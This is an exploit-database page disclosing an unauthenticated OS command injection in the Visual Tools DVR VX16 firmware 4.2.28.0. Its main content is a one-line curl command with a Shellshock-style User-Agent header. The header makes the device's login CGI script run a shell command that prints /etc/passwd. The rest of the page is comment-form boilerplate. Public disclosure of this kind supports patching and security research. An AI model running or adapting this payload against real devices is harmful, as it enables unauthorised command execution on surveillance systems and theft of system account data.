Visual Tools DVR VX16 4.2.28.0 Command Injection

2021.07.09

Credit: Andrea D'Ubaldo

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-78

# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.
# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Visual Tools DVR VX16 4.2.28.0 Command Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.